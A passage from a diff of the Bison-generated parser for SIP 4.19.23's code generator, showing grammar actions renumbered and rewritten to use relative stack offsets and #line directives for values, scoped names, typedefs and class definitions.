"sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 345: /* optunop: '&' */ ++#line 2845 "parser.y" ++ { + (yyval.qchar) = '&'; + } ++#line 5648 "../parser.c" + break; + +- case 345: +-#line 2824 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if ((yyvsp[(2) - (3)].qchar) != '\0' && (yyvsp[(3) - (3)].value).vtype == string_value) ++ case 346: /* value: optcast optunop simplevalue */ ++#line 2850 "parser.y" ++ { ++ if ((yyvsp[-1].qchar) != '\0' && (yyvsp[0].value).vtype == string_value) + yyerror("Invalid unary operator for string"); + + /* Convert the value to a simple expression on the heap. 
*/ + (yyval.valp) = sipMalloc(sizeof (valueDef)); + +- *(yyval.valp) = (yyvsp[(3) - (3)].value); +- (yyval.valp)->vunop = (yyvsp[(2) - (3)].qchar); ++ *(yyval.valp) = (yyvsp[0].value); ++ (yyval.valp)->vunop = (yyvsp[-1].qchar); + (yyval.valp)->vbinop = '\0'; +- (yyval.valp)->cast = (yyvsp[(1) - (3)].scpvalp); ++ (yyval.valp)->cast = (yyvsp[-2].scpvalp); + (yyval.valp)->next = NULL; + } ++#line 5666 "../parser.c" + break; + +- case 346: +-#line 2839 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 347: /* optcast: %empty */ ++#line 2865 "parser.y" ++ { + (yyval.scpvalp) = NULL; + } ++#line 5674 "../parser.c" + break; + +- case 347: +-#line 2842 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.scpvalp) = (yyvsp[(2) - (3)].scpvalp); ++ case 348: /* optcast: '(' scopedname ')' */ ++#line 2868 "parser.y" ++ { ++ (yyval.scpvalp) = (yyvsp[-1].scpvalp); + } ++#line 5682 "../parser.c" + break; + +- case 348: +-#line 2847 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 349: /* scopedname: TK_SCOPE scopednamehead */ ++#line 2873 "parser.y" ++ { + if (currentSpec->genc) + yyerror("Scoped names are not allowed in a C module"); + +- (yyval.scpvalp) = scopeScopedName(NULL, (yyvsp[(2) - (2)].scpvalp)); ++ (yyval.scpvalp) = scopeScopedName(NULL, (yyvsp[0].scpvalp)); + } ++#line 5693 "../parser.c" + break; + +- case 351: +-#line 2857 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 352: /* scopednamehead: scopednamehead TK_SCOPE scopepart */ ++#line 2883 "parser.y" ++ { + if (currentSpec->genc) + yyerror("Scoped names are not allowed in a C module"); + +- appendScopedName(&(yyvsp[(1) - (3)].scpvalp), (yyvsp[(3) - (3)].scpvalp)); ++ appendScopedName(&(yyvsp[-2].scpvalp), (yyvsp[0].scpvalp)); + } ++#line 5704 "../parser.c" + break; + +- case 352: +-#line 2865 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.scpvalp) = text2scopePart((yyvsp[(1) - (1)].text)); ++ case 353: /* scopepart: TK_NAME_VALUE */ ++#line 2891 "parser.y" ++ { ++ (yyval.scpvalp) = 
text2scopePart((yyvsp[0].text)); + } ++#line 5712 "../parser.c" + break; + +- case 353: +-#line 2870 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 354: /* bool_value: TK_TRUE_VALUE */ ++#line 2896 "parser.y" ++ { + (yyval.boolean) = TRUE; + } ++#line 5720 "../parser.c" + break; + +- case 354: +-#line 2873 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 355: /* bool_value: TK_FALSE_VALUE */ ++#line 2899 "parser.y" ++ { + (yyval.boolean) = FALSE; + } ++#line 5728 "../parser.c" + break; + +- case 355: +-#line 2878 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 356: /* simplevalue: scopedname */ ++#line 2904 "parser.y" ++ { + /* + * We let the C++ compiler decide if the value is a valid one - no + * point in building a full C++ parser here. + */ + + (yyval.value).vtype = scoped_value; +- (yyval.value).u.vscp = (yyvsp[(1) - (1)].scpvalp); ++ (yyval.value).u.vscp = (yyvsp[0].scpvalp); + } ++#line 5742 "../parser.c" + break; + +- case 356: +-#line 2887 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 357: /* simplevalue: basetype '(' exprlist ')' */ ++#line 2913 "parser.y" ++ { + fcallDef *fcd; + + fcd = sipMalloc(sizeof (fcallDef)); +- *fcd = (yyvsp[(3) - (4)].fcall); +- fcd -> type = (yyvsp[(1) - (4)].memArg); ++ *fcd = (yyvsp[-1].fcall); ++ fcd -> type = (yyvsp[-3].memArg); + + (yyval.value).vtype = fcall_value; + (yyval.value).u.fcd = fcd; + } ++#line 5757 "../parser.c" + break; + +- case 357: +-#line 2897 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 358: /* simplevalue: '{' '}' */ ++#line 2923 "parser.y" ++ { + (yyval.value).vtype = empty_value; + } ++#line 5765 "../parser.c" + break; + +- case 358: +-#line 2900 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 359: /* simplevalue: TK_REAL_VALUE */ ++#line 2926 "parser.y" ++ { + (yyval.value).vtype = real_value; +- (yyval.value).u.vreal = (yyvsp[(1) - (1)].real); ++ (yyval.value).u.vreal = (yyvsp[0].real); + } ++#line 5774 "../parser.c" + break; + +- case 359: +-#line 2904 
"sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 360: /* simplevalue: TK_NUMBER_VALUE */ ++#line 2930 "parser.y" ++ { + (yyval.value).vtype = numeric_value; +- (yyval.value).u.vnum = (yyvsp[(1) - (1)].number); ++ (yyval.value).u.vnum = (yyvsp[0].number); + } ++#line 5783 "../parser.c" + break; + +- case 360: +-#line 2908 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 361: /* simplevalue: bool_value */ ++#line 2934 "parser.y" ++ { + (yyval.value).vtype = numeric_value; +- (yyval.value).u.vnum = (yyvsp[(1) - (1)].boolean); ++ (yyval.value).u.vnum = (yyvsp[0].boolean); + } ++#line 5792 "../parser.c" + break; + +- case 361: +-#line 2912 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 362: /* simplevalue: TK_NULL_VALUE */ ++#line 2938 "parser.y" ++ { + (yyval.value).vtype = numeric_value; + (yyval.value).u.vnum = 0; + } ++#line 5801 "../parser.c" + break; + +- case 362: +-#line 2916 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 363: /* simplevalue: TK_STRING_VALUE */ ++#line 2942 "parser.y" ++ { + (yyval.value).vtype = string_value; +- (yyval.value).u.vstr = (yyvsp[(1) - (1)].text); ++ (yyval.value).u.vstr = (yyvsp[0].text); + } ++#line 5810 "../parser.c" + break; + +- case 363: +-#line 2920 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 364: /* simplevalue: TK_QCHAR_VALUE */ ++#line 2946 "parser.y" ++ { + (yyval.value).vtype = qchar_value; +- (yyval.value).u.vqchar = (yyvsp[(1) - (1)].qchar); ++ (yyval.value).u.vqchar = (yyvsp[0].qchar); + } ++#line 5819 "../parser.c" + break; + +- case 364: +-#line 2926 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 365: /* exprlist: %empty */ ++#line 2952 "parser.y" ++ { + /* No values. */ + + (yyval.fcall).nrArgs = 0; + } ++#line 5829 "../parser.c" + break; + +- case 365: +-#line 2931 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 366: /* exprlist: expr */ ++#line 2957 "parser.y" ++ { + /* The single or first expression. 
*/ + +- (yyval.fcall).args[0] = (yyvsp[(1) - (1)].valp); ++ (yyval.fcall).args[0] = (yyvsp[0].valp); + (yyval.fcall).nrArgs = 1; + } ++#line 5840 "../parser.c" + break; + +- case 366: +-#line 2937 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 367: /* exprlist: exprlist ',' expr */ ++#line 2963 "parser.y" ++ { + /* Check that it wasn't ...(,expression...). */ + + if ((yyval.fcall).nrArgs == 0) +@@ -5971,19 +5849,20 @@ yyreduce: + + /* Check there is room. */ + +- if ((yyvsp[(1) - (3)].fcall).nrArgs == MAX_NR_ARGS) ++ if ((yyvsp[-2].fcall).nrArgs == MAX_NR_ARGS) + yyerror("Internal error - increase the value of MAX_NR_ARGS"); + +- (yyval.fcall) = (yyvsp[(1) - (3)].fcall); ++ (yyval.fcall) = (yyvsp[-2].fcall); + +- (yyval.fcall).args[(yyval.fcall).nrArgs] = (yyvsp[(3) - (3)].valp); ++ (yyval.fcall).args[(yyval.fcall).nrArgs] = (yyvsp[0].valp); + (yyval.fcall).nrArgs++; + } ++#line 5861 "../parser.c" + break; + +- case 367: +-#line 2955 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 368: /* typedef: TK_TYPEDEF cpptype TK_NAME_VALUE optflags ';' optdocstring */ ++#line 2981 "parser.y" ++ { + if (notSkipping()) + { + const char *annos[] = { +@@ -5999,17 +5878,18 @@ yyreduce: + NULL + }; + +- checkAnnos(&(yyvsp[(4) - (6)].optflags), annos); ++ checkAnnos(&(yyvsp[-2].optflags), annos); + +- applyTypeFlags(currentModule, &(yyvsp[(2) - (6)].memArg), &(yyvsp[(4) - (6)].optflags)); +- newTypedef(currentSpec, currentModule, (yyvsp[(3) - (6)].text), &(yyvsp[(2) - (6)].memArg), &(yyvsp[(4) - (6)].optflags), (yyvsp[(6) - (6)].docstr)); ++ applyTypeFlags(currentModule, &(yyvsp[-4].memArg), &(yyvsp[-2].optflags)); ++ newTypedef(currentSpec, currentModule, (yyvsp[-3].text), &(yyvsp[-4].memArg), &(yyvsp[-2].optflags), (yyvsp[0].docstr)); + } + } ++#line 5888 "../parser.c" + break; + +- case 368: +-#line 2977 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 369: /* typedef: TK_TYPEDEF cpptype '(' '*' TK_NAME_VALUE ')' '(' cpptypelist ')' optflags ';' optdocstring */ ++#line 
3003 "parser.y" ++ { + if (notSkipping()) + { + const char *annos[] = { +@@ -6027,41 +5907,43 @@ yyreduce: + signatureDef *sig; + argDef ftype; + +- checkAnnos(&(yyvsp[(10) - (12)].optflags), annos); ++ checkAnnos(&(yyvsp[-2].optflags), annos); + +- applyTypeFlags(currentModule, &(yyvsp[(2) - (12)].memArg), &(yyvsp[(10) - (12)].optflags)); ++ applyTypeFlags(currentModule, &(yyvsp[-10].memArg), &(yyvsp[-2].optflags)); + + memset(&ftype, 0, sizeof (argDef)); + + /* Create the full signature on the heap. */ + sig = sipMalloc(sizeof (signatureDef)); +- *sig = (yyvsp[(8) - (12)].signature); +- sig->result = (yyvsp[(2) - (12)].memArg); ++ *sig = (yyvsp[-4].signature); ++ sig->result = (yyvsp[-10].memArg); + + /* Create the full type. */ + ftype.atype = function_type; + ftype.nrderefs = 1; + ftype.u.sa = sig; + +- newTypedef(currentSpec, currentModule, (yyvsp[(5) - (12)].text), &ftype, &(yyvsp[(10) - (12)].optflags), (yyvsp[(12) - (12)].docstr)); ++ newTypedef(currentSpec, currentModule, (yyvsp[-7].text), &ftype, &(yyvsp[-2].optflags), (yyvsp[0].docstr)); + } + } ++#line 5930 "../parser.c" + break; + +- case 369: +-#line 3016 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if (currentSpec -> genc && (yyvsp[(2) - (2)].scpvalp)->next != NULL) ++ case 370: /* $@10: %empty */ ++#line 3042 "parser.y" ++ { ++ if (currentSpec -> genc && (yyvsp[0].scpvalp)->next != NULL) + yyerror("Namespaces not allowed in a C module"); + + if (notSkipping()) + currentSupers = NULL; + } ++#line 5942 "../parser.c" + break; + +- case 370: +-#line 3022 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 371: /* $@11: %empty */ ++#line 3048 "parser.y" ++ { + if (notSkipping()) + { + const char *annos[] = { +@@ -6091,33 +5973,36 @@ yyreduce: + NULL + }; + +- checkAnnos(&(yyvsp[(5) - (5)].optflags), annos); ++ checkAnnos(&(yyvsp[0].optflags), annos); + + if (currentSpec->genc && currentSupers != NULL) + yyerror("Super-classes not allowed in a C module struct"); + +- defineClass((yyvsp[(2) - 
(5)].scpvalp), currentSupers, &(yyvsp[(5) - (5)].optflags)); ++ defineClass((yyvsp[-3].scpvalp), currentSupers, &(yyvsp[0].optflags)); + sectionFlags = SECT_IS_PUBLIC; + } + } ++#line 5986 "../parser.c" + break; + +- case 371: +-#line 3060 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 372: /* struct: TK_STRUCT scopedname $@10 superclasses optflags $@11 optclassbody ';' */ ++#line 3086 "parser.y" ++ { + if (notSkipping()) +- completeClass((yyvsp[(2) - (8)].scpvalp), &(yyvsp[(5) - (8)].optflags), (yyvsp[(7) - (8)].boolean)); ++ completeClass((yyvsp[-6].scpvalp), &(yyvsp[-3].optflags), (yyvsp[-1].boolean)); + } ++#line 5995 "../parser.c" + break; + +- case 372: +-#line 3066 "sip-4.19.23/sipgen/metasrc/parser.y" +- {currentIsTemplate = TRUE;} ++ case 373: /* $@12: %empty */ ++#line 3092 "parser.y" ++ {currentIsTemplate = TRUE;} ++#line 6001 "../parser.c" + break; + +- case 373: +-#line 3066 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 374: /* classtmpl: template $@12 class */ ++#line 3092 "parser.y" ++ { + if (currentSpec->genc) + yyerror("Class templates not allowed in a C module"); + +@@ -6128,12 +6013,12 @@ yyreduce: + /* + * Make sure there is room for the extra class name argument. 
+ */ +- if ((yyvsp[(1) - (3)].signature).nrArgs == MAX_NR_ARGS) ++ if ((yyvsp[-2].signature).nrArgs == MAX_NR_ARGS) + yyerror("Internal error - increase the value of MAX_NR_ARGS"); + + tcd = sipMalloc(sizeof (classTmplDef)); +- tcd->sig = (yyvsp[(1) - (3)].signature); +- tcd->cd = (yyvsp[(3) - (3)].klass); ++ tcd->sig = (yyvsp[-2].signature); ++ tcd->cd = (yyvsp[0].klass); + tcd->next = currentSpec->classtemplates; + + currentSpec->classtemplates = tcd; +@@ -6141,29 +6026,32 @@ yyreduce: + + currentIsTemplate = FALSE; + } ++#line 6030 "../parser.c" + break; + +- case 374: +-#line 3092 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.signature) = (yyvsp[(3) - (4)].signature); ++ case 375: /* template: TK_TEMPLATE '<' cpptypelist '>' */ ++#line 3118 "parser.y" ++ { ++ (yyval.signature) = (yyvsp[-1].signature); + } ++#line 6038 "../parser.c" + break; + +- case 375: +-#line 3097 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 376: /* $@13: %empty */ ++#line 3123 "parser.y" ++ { + if (currentSpec->genc) + yyerror("Class definition not allowed in a C module"); + + if (notSkipping()) + currentSupers = NULL; + } ++#line 6050 "../parser.c" + break; + +- case 376: +-#line 3103 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 377: /* $@14: %empty */ ++#line 3129 "parser.y" ++ { + if (notSkipping()) + { + const char *annos[] = { +@@ -6192,30 +6080,32 @@ yyreduce: + NULL + }; + +- checkAnnos(&(yyvsp[(5) - (5)].optflags), annos); ++ checkAnnos(&(yyvsp[0].optflags), annos); + +- defineClass((yyvsp[(2) - (5)].scpvalp), currentSupers, &(yyvsp[(5) - (5)].optflags)); ++ defineClass((yyvsp[-3].scpvalp), currentSupers, &(yyvsp[0].optflags)); + sectionFlags = SECT_IS_PRIVATE; + } + } ++#line 6090 "../parser.c" + break; + +- case 377: +-#line 3137 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 378: /* class: TK_CLASS scopedname $@13 superclasses optflags $@14 optclassbody ';' */ ++#line 3163 "parser.y" ++ { + if (notSkipping()) +- (yyval.klass) = completeClass((yyvsp[(2) - 
(8)].scpvalp), &(yyvsp[(5) - (8)].optflags), (yyvsp[(7) - (8)].boolean)); ++ (yyval.klass) = completeClass((yyvsp[-6].scpvalp), &(yyvsp[-3].optflags), (yyvsp[-1].boolean)); + } ++#line 6099 "../parser.c" + break; + +- case 382: +-#line 3151 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if (notSkipping() && (yyvsp[(1) - (2)].token) == TK_PUBLIC) ++ case 383: /* superclass: class_access scopedname */ ++#line 3177 "parser.y" ++ { ++ if (notSkipping() && (yyvsp[-1].token) == TK_PUBLIC) + { + argDef ad; + classDef *super; +- scopedNameDef *snd = (yyvsp[(2) - (2)].scpvalp); ++ scopedNameDef *snd = (yyvsp[0].scpvalp); + + /* + * This is a hack to allow typedef'ed classes to be used before +@@ -6260,53 +6150,60 @@ yyreduce: + appendToClassList(¤tSupers, super); + } + } ++#line 6154 "../parser.c" + break; + +- case 383: +-#line 3203 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 384: /* class_access: %empty */ ++#line 3229 "parser.y" ++ { + (yyval.token) = TK_PUBLIC; + } ++#line 6162 "../parser.c" + break; + +- case 384: +-#line 3206 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 385: /* class_access: TK_PUBLIC */ ++#line 3232 "parser.y" ++ { + (yyval.token) = TK_PUBLIC; + } ++#line 6170 "../parser.c" + break; + +- case 385: +-#line 3209 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 386: /* class_access: TK_PROTECTED */ ++#line 3235 "parser.y" ++ { + (yyval.token) = TK_PROTECTED; + } ++#line 6178 "../parser.c" + break; + +- case 386: +-#line 3212 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 387: /* class_access: TK_PRIVATE */ ++#line 3238 "parser.y" ++ { + (yyval.token) = TK_PRIVATE; + } ++#line 6186 "../parser.c" + break; + +- case 387: +-#line 3217 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 388: /* optclassbody: %empty */ ++#line 3243 "parser.y" ++ { + (yyval.boolean) = FALSE; + } ++#line 6194 "../parser.c" + break; + +- case 388: +-#line 3220 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 389: /* optclassbody: '{' classbody '}' */ ++#line 
3246 "parser.y" ++ { + (yyval.boolean) = TRUE; + } ++#line 6202 "../parser.c" + break; + +- case 402: +-#line 3240 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 403: /* classline: docstring */ ++#line 3266 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6314,30 +6211,33 @@ yyreduce: + if (scope->docstring != NULL) + yyerror("%Docstring already given for class"); + +- scope->docstring = (yyvsp[(1) - (1)].docstr); ++ scope->docstring = (yyvsp[0].docstr); + } + } ++#line 6218 "../parser.c" + break; + +- case 403: +-#line 3251 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 404: /* classline: typecode */ ++#line 3277 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tScope()->cppcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(¤tScope()->cppcode, (yyvsp[0].codeb)); + } ++#line 6227 "../parser.c" + break; + +- case 404: +-#line 3255 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 405: /* classline: typehdrcode */ ++#line 3281 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tScope()->iff->hdrcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(¤tScope()->iff->hdrcode, (yyvsp[0].codeb)); + } ++#line 6236 "../parser.c" + break; + +- case 405: +-#line 3259 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 406: /* classline: travcode */ ++#line 3285 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6345,14 +6245,15 @@ yyreduce: + if (scope->travcode != NULL) + yyerror("%GCTraverseCode already given for class"); + +- appendCodeBlock(&scope->travcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->travcode, (yyvsp[0].codeb)); + } + } ++#line 6252 "../parser.c" + break; + +- case 406: +-#line 3270 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 407: /* classline: clearcode */ ++#line 3296 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6360,14 +6261,15 @@ yyreduce: + if (scope->clearcode != NULL) + yyerror("%GCClearCode already given for 
class"); + +- appendCodeBlock(&scope->clearcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->clearcode, (yyvsp[0].codeb)); + } + } ++#line 6268 "../parser.c" + break; + +- case 407: +-#line 3281 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 408: /* classline: getbufcode */ ++#line 3307 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6375,14 +6277,15 @@ yyreduce: + if (scope->getbufcode != NULL) + yyerror("%BIGetBufferCode already given for class"); + +- appendCodeBlock(&scope->getbufcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->getbufcode, (yyvsp[0].codeb)); + } + } ++#line 6284 "../parser.c" + break; + +- case 408: +-#line 3292 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 409: /* classline: releasebufcode */ ++#line 3318 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6390,14 +6293,15 @@ yyreduce: + if (scope->releasebufcode != NULL) + yyerror("%BIReleaseBufferCode already given for class"); + +- appendCodeBlock(&scope->releasebufcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->releasebufcode, (yyvsp[0].codeb)); + } + } ++#line 6300 "../parser.c" + break; + +- case 409: +-#line 3303 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 410: /* classline: readbufcode */ ++#line 3329 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6405,14 +6309,15 @@ yyreduce: + if (scope->readbufcode != NULL) + yyerror("%BIGetReadBufferCode already given for class"); + +- appendCodeBlock(&scope->readbufcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->readbufcode, (yyvsp[0].codeb)); + } + } ++#line 6316 "../parser.c" + break; + +- case 410: +-#line 3314 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 411: /* classline: writebufcode */ ++#line 3340 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6420,14 +6325,15 @@ yyreduce: + if (scope->writebufcode != NULL) + yyerror("%BIGetWriteBufferCode 
already given for class"); + +- appendCodeBlock(&scope->writebufcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->writebufcode, (yyvsp[0].codeb)); + } + } ++#line 6332 "../parser.c" + break; + +- case 411: +-#line 3325 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 412: /* classline: segcountcode */ ++#line 3351 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6435,14 +6341,15 @@ yyreduce: + if (scope->segcountcode != NULL) + yyerror("%BIGetSegCountCode already given for class"); + +- appendCodeBlock(&scope->segcountcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->segcountcode, (yyvsp[0].codeb)); + } + } ++#line 6348 "../parser.c" + break; + +- case 412: +-#line 3336 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 413: /* classline: charbufcode */ ++#line 3362 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6450,14 +6357,15 @@ yyreduce: + if (scope->charbufcode != NULL) + yyerror("%BIGetCharBufferCode already given for class"); + +- appendCodeBlock(&scope->charbufcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->charbufcode, (yyvsp[0].codeb)); + } + } ++#line 6364 "../parser.c" + break; + +- case 413: +-#line 3347 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 414: /* classline: instancecode */ ++#line 3373 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6465,14 +6373,15 @@ yyreduce: + if (scope->instancecode != NULL) + yyerror("%InstanceCode already given for class"); + +- appendCodeBlock(&scope->instancecode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->instancecode, (yyvsp[0].codeb)); + } + } ++#line 6380 "../parser.c" + break; + +- case 414: +-#line 3358 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 415: /* classline: picklecode */ ++#line 3384 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6480,14 +6389,15 @@ yyreduce: + if (scope->picklecode != NULL) + 
yyerror("%PickleCode already given for class"); + +- appendCodeBlock(&scope->picklecode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->picklecode, (yyvsp[0].codeb)); + } + } ++#line 6396 "../parser.c" + break; + +- case 415: +-#line 3369 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 416: /* classline: finalcode */ ++#line 3395 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6495,14 +6405,15 @@ yyreduce: + if (scope->finalcode != NULL) + yyerror("%FinalisationCode already given for class"); + +- appendCodeBlock(&scope->finalcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->finalcode, (yyvsp[0].codeb)); + } + } ++#line 6412 "../parser.c" + break; + +- case 416: +-#line 3380 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 417: /* classline: classtypehintcode */ ++#line 3406 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6510,14 +6421,15 @@ yyreduce: + if (scope->typehintcode != NULL) + yyerror("%TypeHintCode already given for class"); + +- appendCodeBlock(&scope->typehintcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->typehintcode, (yyvsp[0].codeb)); + } + } ++#line 6428 "../parser.c" + break; + +- case 420: +-#line 3394 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 421: /* classline: TK_TOSUBCLASS codeblock */ ++#line 3420 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6525,14 +6437,15 @@ yyreduce: + if (scope->convtosubcode != NULL) + yyerror("Class has more than one %ConvertToSubClassCode directive"); + +- appendCodeBlock(&scope->convtosubcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(&scope->convtosubcode, (yyvsp[0].codeb)); + } + } ++#line 6444 "../parser.c" + break; + +- case 421: +-#line 3405 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 422: /* classline: TK_TOTYPE codeblock */ ++#line 3431 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6540,14 +6453,15 @@ yyreduce: + if 
(scope->convtocode != NULL) + yyerror("Class has more than one %ConvertToTypeCode directive"); + +- appendCodeBlock(&scope->convtocode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(&scope->convtocode, (yyvsp[0].codeb)); + } + } ++#line 6460 "../parser.c" + break; + +- case 422: +-#line 3416 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 423: /* classline: TK_FROMTYPE codeblock */ ++#line 3442 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -6555,172 +6469,188 @@ yyreduce: + if (scope->convfromcode != NULL) + yyerror("Class has more than one %ConvertFromTypeCode directive"); + +- appendCodeBlock(&scope->convfromcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(&scope->convfromcode, (yyvsp[0].codeb)); + } + } ++#line 6476 "../parser.c" + break; + +- case 423: +-#line 3427 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 424: /* classline: TK_PUBLIC optslot ':' */ ++#line 3453 "parser.y" ++ { + if (currentSpec -> genc) + yyerror("public section not allowed in a C module"); + + if (notSkipping()) +- sectionFlags = SECT_IS_PUBLIC | (yyvsp[(2) - (3)].number); ++ sectionFlags = SECT_IS_PUBLIC | (yyvsp[-1].number); + } ++#line 6488 "../parser.c" + break; + +- case 424: +-#line 3434 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 425: /* classline: TK_PROTECTED optslot ':' */ ++#line 3460 "parser.y" ++ { + if (currentSpec -> genc) + yyerror("protected section not allowed in a C module"); + + if (notSkipping()) +- sectionFlags = SECT_IS_PROT | (yyvsp[(2) - (3)].number); ++ sectionFlags = SECT_IS_PROT | (yyvsp[-1].number); + } ++#line 6500 "../parser.c" + break; + +- case 425: +-#line 3441 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 426: /* classline: TK_PRIVATE optslot ':' */ ++#line 3467 "parser.y" ++ { + if (currentSpec -> genc) + yyerror("private section not allowed in a C module"); + + if (notSkipping()) +- sectionFlags = SECT_IS_PRIVATE | (yyvsp[(2) - (3)].number); ++ sectionFlags = SECT_IS_PRIVATE | 
(yyvsp[-1].number); + } ++#line 6512 "../parser.c" + break; + +- case 426: +-#line 3448 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 427: /* classline: TK_SIGNALS ':' */ ++#line 3474 "parser.y" ++ { + if (currentSpec -> genc) + yyerror("signals section not allowed in a C module"); + + if (notSkipping()) + sectionFlags = SECT_IS_SIGNAL; + } ++#line 6524 "../parser.c" + break; + +- case 427: +-#line 3457 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if ((yyvsp[(2) - (3)].property).name == NULL) ++ case 428: /* property: TK_PROPERTY property_args property_body */ ++#line 3483 "parser.y" ++ { ++ if ((yyvsp[-1].property).name == NULL) + yyerror("A %Property directive must have a 'name' argument"); + +- if ((yyvsp[(2) - (3)].property).get == NULL) ++ if ((yyvsp[-1].property).get == NULL) + yyerror("A %Property directive must have a 'get' argument"); + + if (notSkipping()) + addProperty(currentSpec, currentModule, currentScope(), +- (yyvsp[(2) - (3)].property).name, (yyvsp[(2) - (3)].property).get, (yyvsp[(2) - (3)].property).set, (yyvsp[(3) - (3)].property).docstring); ++ (yyvsp[-1].property).name, (yyvsp[-1].property).get, (yyvsp[-1].property).set, (yyvsp[0].property).docstring); 